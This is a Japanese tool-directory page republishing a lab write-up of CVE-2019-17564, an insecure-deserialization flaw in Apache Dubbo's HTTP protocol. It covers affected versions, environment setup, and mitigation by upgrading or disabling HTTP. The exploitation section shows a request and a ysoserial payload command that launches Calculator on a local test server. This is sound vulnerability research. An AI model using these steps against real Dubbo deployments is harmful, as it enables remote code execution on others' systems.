Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-17564 — CVE-2019-17564:Apache Dubbo デシリアライゼーション脆弱性 | Kitploit
ツール/GitHubGitHub/fairyming/cve-2019-17564
脆弱性分析コード分析エクスプロイトウェブアプリケーション悪用リモートアクセスツールペイロード開発
GitHubfairyming/cve-2019-17564

CVE-2019-17564

CVE-2019-17564:Apache Dubbo デシリアライゼーション脆弱性

リポジトリを見る
856年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-17564:Apache Dubbo 逆シリアル化脆弱性

0x00 概要

Apache Dubboは、高性能で軽量なオープンソースJava RPCフレームワークです。インターフェース指向のリモートメソッド呼び出し、インテリジェントなフォールトトレランスと負荷分散、そしてサービスの自動登録と検出という3つの主要な機能を提供します。

0x01 脆弱性の概要

Apache Dubboは複数のプロトコルをサポートしており、公式ではDubboプロトコルを推奨しています。Apache Dubbo HTTPプロトコルにおける逆シリアル化の脆弱性(CVE-2019-17564)です。この脆弱性の主な原因は、Apache DubboがHTTPプロトコルを有効にした後、メッセージボディの処理が適切でないために安全でない逆シリアル化が発生し、プロジェクトのパッケージ内に利用可能なガジェットが存在する場合、リモートコード実行が可能になることです。

0x02 影響を受けるバージョン

2.7.0 <= Apache Dubbo <= 2.7.4.1 2.6.0 <= Apache Dubbo <= 2.6.7 Apache Dubbo = 2.5.x

0x03 環境構築

1、dubboの起動にはzookeeperの依存が必要なため、先にzookeeperをインストールします

root@kitploit:~
wget https://archive.apache.org/dist/zookeeper/zookeeper-3.4.10/zookeeper-3.4.10.tar.gz
# confディレクトリ内のzoo_sample.cfgをzoo.cfgに名前変更します
mv zoo_sample.cfg zoo.cfg
# binディレクトリに移動し、zookeeperを起動します
./zkServer.sh start

WX20200222-171524@2x.png

2、GitHubからdubboのプロジェクトを取得し、pom.xmlを編集します

root@kitploit:~
git clone https://github.com/apache/dubbo-samples
# dubbo-samples-httpディレクトリに移動し、pom.xmlを編集します
vim pom.xml

dubboのバージョンを脆弱性のあるバージョンに変更します WX20200222-172028@2x.png 依存関係を追加し、トリガー可能なガジェットをインポートします。ここではcommons-collections4-4.0をインポートします

root@kitploit:~
<dependency>
        <groupId>org.apache.commons</groupId>
        <artifactId>commons-collections4</artifactId>
        <version>4.0</version>
    </dependency>

WX20200222-172346@2x.png

3、mvnでビルドし、dubboを起動します

root@kitploit:~
mvn clean package
mvn -Djava.net.preferIPv4Stack=true -Dexec.mainClass=org.apache.dubbo.samples.http.HttpProvider exec:java

WX20200222-172721@2x.png

0x04 脆弱性の悪用

payload

root@kitploit:~
POST /org.apache.dubbo.samples.http.api.DemoService HTTP/1.1
Host: 127.0.0.1:8080

paylaod

ここではysoserialを使用してペイロードを生成します

root@kitploit:~
java -jar ysoserial-master-55f1e7c35c-1.jar CommonsCollections4 /System/Applications/Calculator.app/Contents/MacOS/Calculator > 1.ser

bpでパケットを送信 WX20200222-173202@2x.png

0x05 修正方法

  1. HTTPプロトコルを無効にする
  2. 速やかにバージョン2.7.5以上にアップグレードする。関連リンク:https://github.com/apache/dubbo/releases/tag/dubbo-2.7.5

参考リンク:

https://www.mail-archive.com/[email protected]/msg06225.html

ツールをダウンロード